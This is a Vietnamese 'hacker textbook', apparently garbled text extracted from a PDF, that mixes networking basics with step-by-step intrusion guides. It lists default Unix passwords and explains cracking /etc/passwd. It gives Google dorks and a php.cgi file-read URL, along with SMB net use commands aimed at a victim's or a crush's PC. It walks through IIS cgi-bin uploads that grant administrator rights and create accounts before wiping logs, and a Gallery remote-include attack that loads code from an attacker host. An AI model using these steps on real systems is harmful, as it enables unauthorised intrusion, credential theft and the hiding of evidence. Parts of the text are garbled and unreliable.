Đang tải... (xem toàn văn)
Những hiểu biết cơ bản nhất để trở thành hacker, một điều là các bạn cần phảI có kiến thức một cách tổng quát , hiểu các thuật ngữ mà những người rành về mạng hay sử dụng. Riêng tôi thì chưa thật giỏi bao nhiêu nhưng qua nghiên cứu tôi cũng đa tổng hợp được một số kiến thức cơ bản, muốn chia sẻ cho tất cả các bạn, nhằm cùng các bạn học hỏi. Mời các bạn cùng tham khảo.
GIÁO TRÌNH HACKER Những hiểu biết để trở thành Hacker - Phần I Nhiều bạn Newbie có hỏi “Hack nào? Làm để hack?” Nhưng bạn quên điều bạn cần phải có kiến thức cách tổng quát, hiểu thuật ngữ mà người rành mạng hay sử dụng Riêng tơi chưa thật giỏi qua nghiên cứu tổng hợp số kiến thức bản, muốn chia sẻ cho tất bạn, nhằm bạn học hỏi Tôi không chịu trách nhiệm bạn dùng để quậy phá người khác Các bạn copy post trang Web khác điền tiên tác giả bài, tôn trọng viết tơn trọng tơi công sức tôi, đồng thời tôn trọng thân bạn Trong tơi có chèn thêm số cách hack, ##### ví dụ bản, bạn ứng dụng thử nghiên cứu đọc để hiểu thêm, bắt gặp từ mà bạn khơng hiểu đọc để biết, tơi có sử dụng số ý viết mà thấy hay từ trang Web HVA, trang Web khác mà ghé thăm Xin cảm ơn tác giả viết Bây vấn đề Ta cần để bắt đầu? Có thể nhiều bạn khơng đồng ý với cách tốt để thực tập bạn dùng HĐH Window 9X, đến khác mạnh Linux Unix, dướI bạn cần có: + Một OS (có thể DOS, Window 9X, Linux, Unit ….) + Một trang Web tốt (HVA chẳng hạn hi`hi` greenbiggrin.gif greenbiggrin.gif) + Một trình duyệt mạng tốt (là Nescape, IE, tốt có lẽ Gozzila) + Một công cụ chat tốt (mIRC,Yahoo Mass … ) + Telnet (hoặc tương tự nmap …) + Cái quan trọng mà muốn trở thành hacker phải có chút kiến thức lập trình (C, C++, Visual Basic, Pert … ) Thế địa IP? - Địa IP chia thành số giới hạn từ - 255 Mỗi số lưu byte - > IP có kicks thước 4byte, chia thành lớp địa Có lớp A, B, C Nếu lớp A, ta có 16 triệu điạ chỉ, lớp B có 65536 địa Ví dụ: Ở lớp B với 132.25, có tất địa từ 132.25.0.0 đến 132.25.255.255 Phần lớn địa lớp A sở hữu công ty hay tổ chức Một ISP thường sở hữu vài địa lớp B C Ví dụ: Nếu địa IP bạn 132.25.23.24 bạn xác định ISP bạn (có IP 132.25.x.) - IP từ viết tắt Internet Protocol, Internet địa IP mỗI người đạI diện cho người đó, địa IP sử dụng máy tính khác để nhận biết máy tính kết nối chúng Đây lí bạn lại bị IRC cấm, cách người ta tìm IP bạn Địa IP dễ dàng phát ra, người ta lấy qua cách sau: + bạn lướt qua trang web, IP bạn bị ghi lại + IRC, có IP bạn + ICQ, người biết IP bạn, chí bạn chọn ``do not show ip`` người ta lấy + bạn kết nối với đó, họ gõ ``systat –n ``, biết kết nối đên họ + gửi cho bạn email với đoạn mã java tóm IP, họ tóm IP bạn Làm để biết địa IP mình? Run đánh lệnh “winipcfg”._ Trong Window: vào Start _ Trong mIRC: kết nốI đến máy chủ sau đánh lệnh “/dns” _ Thơng qua số trang Web có hiển thị IP IP Spoofing gì? Một số IP có mục đích để xác định thiết bị giới Vì mạng máy chủ cho phép thiết bị khác trao đổi liệu qua lại mà không cần kiểm tra máy chủ Tuy nhiên thay đổi IP bạn, nghĩa bạn gởi thơng tin giả đến máy khác mà máy tin thơng tin nhận xuất phát từ máy (tất nhiên khơng phải máy bạn) Bạn vượt qua máy chủ mà khơng cần phải có quyền điều khiến máy chủ Điều trở ngại chỗ thông tin phản hồi từ máy chủ gởi đến thiết bị có IP mà giả mạo Vì bạn khơng có phản hồi thơng tin mà mong muốn Có lẽ điều mà spoof IP có hiệu bạn cần vượt qua firewall, trộm account cần dấu thông tin cá nhân! Trojan / worm / virus / logicbomb gì? _ Trojan: Nói cho dễ hiểu chương trình điệp viên cài vào máy người khác để ăn cắp nhũng tài liệu máy gửi cho chủ nhân nó, Cái mà ăn cắp mật khẩu, account, hay cookie ……… tuỳ theo ý muốn người cài _ virus: Nói cho dễ hiểu chương trình với mã đặc biệt cài (hoặc lây lan từ máy khác) lên máy nạn nhân thực yêu cầu mã đó, số virut sử dụng để phá hoại liệu phá hoại máy tính _ worm: Đây chương trình độc lập tự nhân bản thân lây lan khắp bên mạng Cũng giống Virus, phá hoại liệu, phá hoại bên mạng, nhiều làm down mang _ logicbomb: Là chương trình gửi lúc nhiều gói liệu cho địa chỉ, làm ngập lụt hệ thống, tắt nghẽn đường truyền (trên server) dùng làm công cụ để “khủng bố” đối phương (bom Mail) PGP gì? _ PGP viết tắt từ “Pretty Good Privacy”, cơng cụ sử dụng mã hố chìa khố công cộng để bảo vệ hồ sơ Email liệu, dạng mã hố an tồn cao sử dụng phần mềm cho MS_DOS, Unix, VAX/VMS cho dạng khác Proxy gì? _Proxy cung cấp cho người sử dụng truy xuất internet với host đơn Những proxy server phục vụ nghi thức đặt biệt tập nghi thức thực thi dual_homed host basion host Những chương trình cliênt người sử dung qua trung gian proxy server thay cho server thật mà người sử dụng cần giao tiếp Proxy server xác định yêu cầu từ cliênt định đáp ứng hay không đáp ứng, yêu cầu đáp ứng, proxy server kết nối với server thật thay cho cliênt tiếp tục chuyển tiếp đến yêu cầu từ cliêntđến server, đáp ứng yêu cầu server đến cliênt Vì proxy server giống cầu nối trung gian server cliênt _ Proxy cho user truy xuất dịch vụ internet theo nghĩa trực tiếp Với dual host homed cần phải login vào host trước sử dụng dịch vụ internet Điều thường không tiện lợi, số người trể nên thất vọng họ có cảm giác thơng qua firewall, với proxy giải vấn đề Tất nhiên cịn có giao thức nói chung tiện lợi cho user Bởi proxy cho phép user truy xuất dịch vụ internet từ hệ thống cá nhân họ, khơng cho phép packet trực tiếp hệ thống sử dụng internet đường giáng tiếp thông qua dual homed host thông qua kết hợp bastion host screening rounter Unix gì? _ Unix hệ điều hành (giống Window) Nó hệ điều hành mạnh nhất, thân thiết với Hacker Nếu bạn trở thành hacker thật HĐH khơng thể thiếu bạn Nó sử dụng hỗ trợ cho lập trình ngơn ngữ C 9.) Telnet gì? _ Telnet chương trình cho phép ta kết nốI đến máy khác thơng qua cổng (port) Mọi máy tính máy chủ (server) có cổng, sau số cổng thông dụng: + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ Ví dụ: bạn gọI Telnet để kết nốI đến mail.virgin.net port 25 10 Làm để biết đa Telnet đến hệ thống Unix? Đầu tiên, bạn gọi Unix, thông thường xuất dấu nhắc: “Log in:”, (tuy nhiên, với chưa chắn Unix ngoạI trừ chúng xuất thơng báo trước chữ “log in:” ví dụ: Welcome to SHUnix Please log in ….) Bây ta dấu nhắc “log in”, bạn cần phải nhập vào account hợp lệ Một account thông thường gồm có đặc tính hơn, sau bạn nhập account vào, bạn thấy có mật khẩu, bạn thử nhập Default Password thử theo bảng sau: Account -Default Password Root - Root Sys Sys / System / Bin Bin -Mountfsy -Nuuc - Anon -Sys / Bin Mountfsys Anon - Anon User - -User Games -Games Install Install Demo - Demo Guest Guest 11 Shell account gì? _ Một Shell account cho phép bạn sử dụng máy tính nhà bạn thiết bị đầu cuối (terminal) mà với bạn đánh lệnh đến máy tính chạy Unix, “Shell” chương trình có nhiệm vụ dịch ký tự bạn gửi đến đưa vào thực lệnh chương trình Unix Với Shell account xác bạn sử dụng trạm làm việc mạnh nhiều so với mà bạn tưởng tượng đến Bạn lấy “Shell account” miễn phí trang Web http://www.free Shell.com/ nhiên bạn không sử dụng “telnet” bạn trả tiền cho 12 Làm cách để bạn ##### Unix account passwords? _ Rất đơn giản, nhiên cách mà tơi nói với bạn “lạc hậu” rồi, bạn ##### chúng bạn may mắn, cịn khơng bạn đọc để tham khảo _ Đầu tiên bạn đăng nhập vào hệ thống có sử dụng Unix khách hàng người khách ghé thăm, may mắn bạn lấy mật cất dấu hệ thống chuẩn như: /etc/passwd hàng hồ sơ passwd có tài khoản khác nhau, giống hàng này: userid assword:userid#:groupid#:GECOS field:home dir: Shell đó: + userid = the user id name: tên đăng nhập: tên số + password: mật mã Dùng để làm hẳn bạn biết + userid#: số đựơc thông báo cho người đăng ký họ đăng ký lần + groupid#: tương tự userid#, dùng cho người nhóm (như nhóm Hunter Buq HVA chẳng hạn) + GECOS FIELD: nơi chứa thông tin cho người sử dụng, có họ tên đầy đủ, số điện thoại, địa v.v… Đây nguồn tốt để ta dễ dàng ##### mật + home dir: thư mục ghi lạI hoạt động người khách họ ghé thăm (giống mục History IE vậy) +Shell: tên củaShell mà tự động bắt đầu ta login _ Hãy lấy file password, lấy file text mã hố về, sau bạn dùng chương trình ``#####erJack`` ``John the Ripper`` để ##### _ Các bạn thấy dễ phải không? Sai bét, khơng dễ dàng may mắn để bạn ##### hầu hết họ cất kỹ, đọc tiếp bạn thấy khó khăn chỗ 13 Shadowed password gì? _ Một shadowed password biết đến file Unix passwd, bạn nhập mật khẩu, người khác thấy trình đơn (như ký hiệu “ X ” “ * ”) Cái thông báo cho bạn biết file passwd cất giữ nơi khác, nơi mà người sử dụng bình thường khơng thể đến Khơng lẽ ta đành bó tay, dĩ nhiên hacker khơng rồi, ta không đến trực tiếp file shadowed password ta tìm file lưu nó, file Unshadowed Những file hệ thống Unix không cố định, bạn thử với đường dẫn sau: CODE AIX /etc/security/passwd ! or /tcb/auth/files/ / A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/ / SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow maps/tables/whatever > System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Trước dấu “/ ”đầu tiên hàng tên hệ thống tương ứng, vào hệ thông thật bạn muốn lấy lần theo đường dẫn phía sau dấu “/”đầu tiên Và cuối account passwd mà tơi ##### được, hết hiệu lực rồi: CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh Để bảo đảm bí mật nên pass họ tơi xố để vào ký hiệu “x”, bạn tìm hiểu thơng tin có từ chúng xem Hết phần Những hiểu biết để trở thành Hacker-Phần II Vitual port (cổng ảo) số tự nhiên đựợc gói TCP (Tranmission Control Protocol) UDP (User Diagram Protocol) header Như người biết, Windows chạy nhiều chương trình lúc, chương trình có cổng riêng dùng để truyền nhận liệu Ví dụ máy có địa IP 127.0.0.1 chạy WebServer, FTP_Server, POP3 server, etc, dịch vụ đuọc chạy IP address 127.0.0.1, gói tin đuọc gửi đến làm máy tính phân biệt gói tin vào dịch vụ WebServer hay FTP server hay SM! TP? Chính Port xuất Mỗi dịch vụ có số port mặc định, ví dụ FTP có port mặc định 21, web service có port mặc định 80, POP3 110, SMTP 25 vân vân Người quản trị mạng thay đổi số port mặc định này, bạn số port máy chủ, bạn kết nối vào dịch vụ Chắc bạn nghe nói đến PORT MAPPING có lẽ chưa biết chức Port mapping thực đơn giản trình chuyển đổi số port mặc định dịch vụ đến số khác Ví dụ Port mặc định WebServer 80, có lẽ bạn thấy http://www.xxx.com:8080/, 8080 số port host xxx đuợc người quản trị host ``map`` từ 80 thành 8080 15 DNS gì? _ DNS viết tắt Domain Name System Một máy chủ DNS đợi kết nối cổng số 53, có nghĩa bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổng số 53 Máy chủ chạy DNS chuyển hostname chữ thành chữ số tương ứng ngược lại Ví dụ: 127.0.0.1 > localhost localhost - > 127.0.0.1 + Tương tự bạn cần đánh URL dòng sau để lấy pass: Code: http://www.servername.com/cgi-bin/php.cgi?/et c/passwd Quan trọng là lỗi cũ nên việc tìm trang Web để bạn thực hành khó, bạn vào trang google.com đánh từ khoá: /cgi-bin/php.cgi?/etc/passwd] cgi-bin/nph-test-cgi?/etc Trang 53 Giáo trình hack sau bạn tìm xem thử trang chưa fix lỗi để thực hành 25.) Kỹ thuật xâm nhập máy tính online: _ Xâm nhập máy tính online kỹ thuật vừa dễ lạI vừa khó Bạn nói dễ bạn sử dụng công cụ ENT bạn gặp vấn đề dùng tốc độ sử dụng máy nạn nhân bị chậm cách đáng kể máy họ khơng share khơng thể xâm nhập được, họ tắt máy bị cơng cốc chưa kịp chơm account, có cách êm thấm hơn, làm giảm tốc độ xâm nhập nạn nhân khơng share dùng chương trình DOS để cơng Ok, ta bắt đầu: _ Dùng chương trình scan IP ENT để scan IP mục tiêu _ Vào Start == > Run gõ lệnh cmd _ Trong cửa sổ DOS đánh lệnh “net view ” CODE + VD: c:\net view 203.162.30.xx _ Bạn nhìn kết quả, có share dễ q, bạn cần đánh tiếp lệnh net use : + VD: c:\net use E: 203.162.30.xxC _ Nếu kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd bạn download chương trình dị passwd sử dụng (theo tơi bạn load chương trình “pqwak2” áp dụng cho việc dò passwd máy sử dụng HĐH Win98 Winme chương trình “xIntruder” dùng cho Win NT) Chú ý cách sử dụng hai chương trình tương tự nhau, dịng đầu ta đánh IP nạn nhân, dòng thứ hai ta đánh tên ổ đĩa share nạn nhân “xIntruder” ta ý chỉnh Delay cho hợp lý, mạng LAN Delay 100 mạng Internet dướI 5000 _ Nếu máy nạn nhân khơng có share ta đánh lệnh: net use : c$ (hoặc d$)``administrator`` (còn tiếp) + VD: net use E: 203.162.30.xxC$``administrator`` Kiểu chia c$ mặc định tất máy USER ``administrator`` _ Chúng ta áp dụng cách để đột nhập vào máy bạn mà “thầm thương trộm nhớ” để tìm liệu liên quan đến địa cô nàng (với điều kiện cô ta dùng máy nhà bạn may mắn tìm địa đó) Bạn cần chat Y! Mass vào DOS đánh lệnh: c:\netstat –n Khi dùng cách bạn tắt hết cửa sổ khác để khung chat Y!Mass với cô ta thơi, giúp bạn dễ dàng việc xác định địa IP cô ta Sau bạn dùng cách xâm nhập mà tơi nói trên.(Có lẽ anh chàng tykhung hồi xưa tán tỉnh Trang 54 Giáo trình hack bạn xa qua mạng dùng cách để đột nhập tìm hiểu địa ta mà, hi`hi`.) Bạn thành công máy nạn nhân không cài firewall hay proxy =================================================== = Nhiều bạn có u cầu tơi đưa địa xác cho bạn thực tập, đưa rút kinh nghiệm hướng dẫn có địa xác, bạn thực hành xong đoạt quyền admin có bạn xố database họ Như HVA mang tiếng nơi bắt nguồn cho phá hoại mạng mong bạn thơng cảm, tơi nêu cách thức để bạn tìm dịa bị lỗi khơng đưa địa cụ thể =================================================== = Ở phần đề cập đến kỹ thuật chống xâm nhập vào máy tính bạn online, tìm hiểu sơ bước ta định hack trang Web, kỹ thuật tìm lỗi trang Web để thực hành, kỹ thuật hack Web thông qua lỗi Gallery.v.v…… 19.) Kỹ thuật xâm nhập Window NT từ mạng Internet: _ Đây học hack mà thực hành bắt đầu nghiên cứu hack, bày lại cho bạn bạn cần phải có số thời gian đểthực dễ khó Ta bắt đầu: _ Đầu tiên bạn cần tìm server chạy IIS: _ Tiếp đến bạn vào DOS đánh ` FTP ` VD: Code: c:\Ftp http://www.dodgyinc.com/ (trang naỳ thực hành cịn làm được, khơng biết họ fix chưa, bạn có trang khác post lên cho người làm nhé) Nếu connect thành cơng, bạn thấy số dịng tương tự này: CODE Connected to http://www.dodgyinc.com./ 220 Vdodgy Microsoft FTP Service (Version 3.0) User Code: (www.dodgyinc.com:(none)): Cái mà ta thấy có chứa thơng tin quan trọng, cho ta biết tên Netbios máy tính “ Vdodgy ” Từ điều bạn suy diễn tên mà sử dụng cho NT phép ta khai thác, mặc định mà dịch vụ FTP gán cho nó chưa đổi tên “IUSR_VDODGY” Hãy nhớ lấy có ích cho ta Nhập ``anonymous” user xuất dịng sau: Trang 55 Giáo trình hack CODE 331 Anonymous access allowed, send identity (e-mail name) as password Password: Bây passwd mà ta chưa biết, nhiên, bạn thử đánh vào passwd “anonymous” Nếu sai, bạn log in lạI thiết bị FTP, bạn nhớ ta quay lạI lần khơng sử dụng cách mạo danh (anonymous) mà sử dụng “`Guest”, thử lại passwd với “guest” xem Bây bạn đánh lệnh DOS: CODE Cd /c Và nhìn thấy kết bạn xâm nhập thành cơng, bạn nhanh chóng tìm thư mục `cgi-bin` Nếu bạn may mắn, bạn tìm dễ dàng thơng thường hệ thống quản lý đặt `cgi-bin` vào nơi mà ta vừa xâm nhập người quản lý họ dễ dàng điều khiển mạng thư mục cgi-bin chứa chương trình mà bạn lợi dụng để chạy từ trình duyệt Web bạn Ta bắt đầu “quậy” greenbiggrin.gif greenbiggrin.gif _ Đầu tiên, bạn chuyển tớ thư mục cgi-bin sử dụng lệnh “Binary” (có thể bạn khơng cần dùng lệnh này), sau bạn dánh tiếp lệnh “put cmd.exe” Tiếp theo bạn cần có file hack để cài vào thư mục này, tìm mạng để lấy file quan trọng `getadmin.exe` `gasys.dll` Download chúng xuống, bạn có cài vào thư mục cgi-bin Ok, coi việc xong, bạn đóng cửa sổ DOS Bây bạn đánh địa sau lên trình duyệt bạn: Code: http://www.dodgyinc.com/cgi-bin/getadmin.exe? IUSR_VDODGY Sau vài giây bạn có câu trả lời dướI đây: CODE CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers The headers it did return are: Congratulations, now account IUSR_VDODGY have administrator rights! Thế bạn mạo danh admin để xâm nhập hệ thống, việc cần thiết bạn tự tạo cho account, đánh dịng sau IE: Code: http://www.dodgyinc.com/cgi- Trang 56 Giáo trình hack bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add dịng lệnh tạo cho bạn account login với user: anhdenday passwd: toilahackerBây bạn cho user có account admin, bạn cần đánh lên IE lệnh: Code: http://www.dodgyinc.com/cgi-bin/getadmin.exe? anhdenday Vậy xong rùi đó, bạn disconnect đến start menu - > find search computer `www.dodgyinc.com` Khi tìm thấy, bạn vào explore, explore NT mở bạn hay nhập user passwd để mở (của tơi user: anhdenday passwd: toilahacker) Có vấn đề bạn xâm nhập hệ thống bị ghi lại, để xố dấu vết bạn vào `Winnt\system32\logfiles` mở file log xố thơng tin liên quan đến bạn, save chúng Nếu bạn muốn lấy thơng báo việc chia xâm nhập bạn thay đổi ngày tháng máy tính với URL sau: Code: http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20 date%2030/04/03 xong bạn xố file `getadmin.exe`, `gasys.dll` từ `cgi-bin` Mục đích ta xâm nhập hệ thống “chôm” pass admin để lần sau xâm nhập cách hợp lệ, bạn tìm file SAM (chứa pass admin member) hệ thống dùng chương trình “l0pht #####” để ##### pass (Hướng dẫn cách sử dụng “l0pht ##### v 3.02” post lên rồi,các bạn tự nghiên cứu nhé) Đây link: Code: http://vnhacker.org/forum/?act=ST&f=6&t=11566 &s= Khi ##### xong bạn có user pass admin rồi, xoá account user (của tơi “anhdenday”) cho an tồn Bạn làm hệ thống tuỳ thích, bạn đừng xố hết tài liệu họ nhé, tội cho họ Bạn cảm thấy nào, rắc rối phải không Lúc thử hack cách này, tơi mày mị giờ, bạn quen lần thứ bạn thời gian Ở phần đề cập đến HĐH Linux, đến cách ngắt mật bảo vệ Website , làm để hack trang web đơn giản nhất.v.v… 29.) Cách tìm Website bị lỗi: _ Chắc bạn biết đến trang Web chuyên dùng để tìm kiếm thơng tin mạng ? Nhưng bạn khơng ngờ ta dùng trang để tìm trang Web bị lỗi (Tôi thường dùng trang google.com khuyên bạn nên dùng trang mạnh hiệu quả) _ Các bạn quan tâm đến lỗi trang Web muốn tìm chúng bạn cần vào google.com đánh đoạn lỗi vào sau “allinurl: ” VD ta có đoạn mã lỗi trang Web sau: Trang 57 Giáo trình hack cgi-bin/php.cgi?/etc/passwd bạn đánh: “allinurl:cgi-bin/php.cgi?/etc/passwd” Nó liệt kê trang Web bị lỗi cho bạn, bạn nhìn xuống mẫu liệt kê (dòng địa màu xanh cây) dòng viết y chang từ khố nhập vào trang bị lỗi.Các bạn có xâm nhập vào hay khơng cịn tuỳ vào trang Web fix lỗi hay chưa _ Các bạn quan tâm đến lỗi forum, bạn muốn tìm forum dạng để thực tập, cần nhập từ khoá powered by VD sau để tìm forum dùng Snitz 2000: powered by Snitz 2000 _ Tuy nhiên, việc tìm forum trang Web bị lỗi theo cách có xác suất không cao, bạn quan tâm đến đoạn string đặc biệt URL đặc trưng cho kiểu trang Web forum (cái quan trọng, bạn tự tìm hiểu thêm nhé) VD tìm với lỗi Hosting Controller ta có đoạn đặc trưng sau ``/admin hay /advadmin hay /hosting`` ta đánh từ khố: allinurl:/advadmin allinurl:/admin allinurl:/hosting Nó liệt kê trang Web có URL dạng: _http://tentrangweb.com/advadmin _http://tentrangweb.com/admin _http://tentrangweb.com/hosting VD với forum UBB có đoạn đặc trưng ``cgi-bin/ultimatebb.cgi?`` Ta tìm tương tự Chỉ cần bạn biết cách tìm sau cần theo dõi thông tin cập nhật bên trang “Lỗi bảo mật” HVA bạn LeonHart post ngày bạn hiểu ý nghĩa chúng tự kiểm tra 30.) Kỹ thuật hack Web thông qua lỗi Gallery (một dạng lỗi php code inject): _ Gallery công cụ cho phép tạo gallery ảnh web viết PHP, lợi dụng sơ hở ta lợi dụng để viết thêm vào mã PHP cho phép ta upload, mục đích ta _ Trước hết bạn đăng ký host miễn phí, tốt bạn đăng ký brinkster.com cho dễ Sau bạn mở notepad tạo file PHP với đoạn mã sau: CODE Trang 58 Giáo trình hack Đoạn mã bạn tạo làm file có tên khác (nhưng chung mã) đặt tên là: +Shellphp.php: file dùng để chạyShell victim host + init.php: file dùng để upload lên trang có host bạn vừa tạo (Bạn upload file init.php lên sớm ta cịn sử dụng với đoạn mã khác, bạn quên upload file lên tiêu) Bạn tạo thêm file PHP với mã sau: CODE action=$PHP_SELF? Trang 59 Giáo trình hack Bạn đặt tên upload.php, dùng để upload lên trang Web nạn nhân _ Tiếp theo Bạn vào Google, gõ ``Powered by gallery`` enter, Google liệt kê đống site sử dụng Gallery, bạn chọn lấy trang dùng link sau để thử xem cịn mắc lỗI Gallery hay khơng: http:// trang Web nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ / Nếu bạn thấy lên hình chữ nhật phía cùng, bên phải lệnh chuyển tiếp có chữ “Go” coi bạn tìm thấy đối tượng Bây bạn gõ lệnh thơng qua chữ nhật để hack Web nạn nhân Trước hết bạn gõ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục thời nhấn nút “Go”, cho kết bạn nhanh chóng ghi lại đường dẫn phía dướI (Tơi sử dụng VD đường dẫn tơi tìm thấy “/home/abc/xyz/gallery”) Sau bạn đánh tiếp lệnh “|s –a|” để liệt kê thư mục Bây bạn nhìn kết quả, bạn thấy đống thư mục mà ta liệt kê Bạn nhớ mục đích tìm thư mục dùng để upload file upload.php mà ta chuẩn bị từ trước bạn xác định tơi cách nhìn vào chữ cuối hàng kết quả: + Bạn loại bỏ trường hợp thư mục mà có dấu “.” “ ” thư mục gốc thư mục ảo (Nó thường xếp hàng kết quả) + Bạn loạI bỏ hàng có chữ cuối có gắn (VD config.php, check.inc.v.v…) file khơng phải thư mục + Cịn lại thư mục upload tơi khun bạn nên chọn hàng chứa tên thư mục mà có chứa số lớn (Bạn xác định chúng cách nhìn cột thứ từ trái sang), vừa chắn thư mục thư mục ảo, vừa làm cho admin trang Web khó phát ta cài file ta vào Tôi VD phát thư mục “loveyou” có chứa 12 file cho ta upload, đường dẫn thức mà ta upload lên là: /home/abc/xyz/Gallery/loveyou Bây bạn vào account host bạn, sửa nội dung file init.php giống mã file upload.php, sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ” Đồng thời chuẩn bị file upload.php máy bạn với *PATH* “” (2 dấu ngoặc kép) Bây ta upload file upload.php lên trang Web nạn nhân rồi, bạn nhập địa sau trình duyệt Web bạn: http:// trang Web nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ / Bạn thấy xuất tiếp khung hình chữ nhật bên cạnh có nút lệnh, nút “brown”, nút “upload” Nút “brown” bạn dùng để dẫn đến địa file upload.php bạn chuẩn bị máy bạn, nút “upload” bạn nhấn vào upload file upload.php lên trang Web nạn nhân Ok, coi bạn hoàn thành chặng đường hack Web Từ bạn vận dụng để cơng đối thủ Trang 60 Giáo trình hack lấy database, password (làm tương tự hướng dẫn hack trước), bạn nên thực tập đừng xoá database hay phá Web họ Nếu hacker chân bạn cần upload lên trang Web dòng chữ: “Hack by …… ” đủ Cũng lần trước, bạn có thành công hay không tuỳ thuộc vào may mắn kiên trì nghiên cứu vận dụng kiến thức bạn (Dựa theo hướng dẫn hack huynh vnofear – viethacker.net) Trang 61 Hacker làm để hack trang Web: Giống Như Học Sinh Bùi Minh Trí .Tấn Cống Vào Web Bộ Giáo Dục Và Đạo Tạo Các bug, vulnerability công bố toàn cầu chưa site patch Hãy thử bug công nghệ dùng site Admin khơng phải lúc cẩn thận, họ sai lầm Và đúc kết điều sau: CHMOD: nhiều file config forum không CHMOD dẫn đến dễ dàng xem Thơng thường số site bảo mật password MYSQL thường trùng với pass FTP Account Ta dễ dàng deface TROJAN, KEYLOGGER: công cụ đơn giản hiệu nghiệm, admin sơ xuất disable NAV thứ giúp ta có info đặc biệt quan trọng máy chủ Password default: Thứ dễ dàng hiệu nghiệm Admin setup xong server Và sơ ý chưa change password default biết không đổi điều kiện cho bạn attack hay deface ANON FTP: Bài anh chàng hướng dẫn cụ thể Tơi xin nói vấn tắt số server cho đăng nhập FTP nặc danh Tức user " khách " số site cho phép user guest hay anon upload hay download Hãy tận dụng Tôi điểm qua sơ lược vài kinh nghiệm Hy vọng bạn áp dụng thực tế sáng tạo cách hay ... hack huynh vnofear – viethacker.net) GOODLUCK!!!!!!!!!!!! Những hiểu biết để trở thành hacker - Nguồn quantrimang.com gồm có phần (hình vậy) Những hiểu biết để trở thành Hacker - Phần 31.) Gói... mạng dùng cách để đột nhập tìm hiểu địa ta mà, hi`hi`.) Bạn thành công máy nạn nhân không cài firewall hay proxy Những hiểu biết để trở thành Hacker - Phần 26 Tìm hiểu RPC (Remote Procedure Call):... Whitaker:/udd/arranw:/bin/ksh Để bảo đảm bí mật nên pass họ tơi xố để vào ký hiệu “x”, bạn tìm hiểu thơng tin có từ chúng xem Hết phần Những hiểu biết để trở thành Hacker- Phần II Vitual port (cổng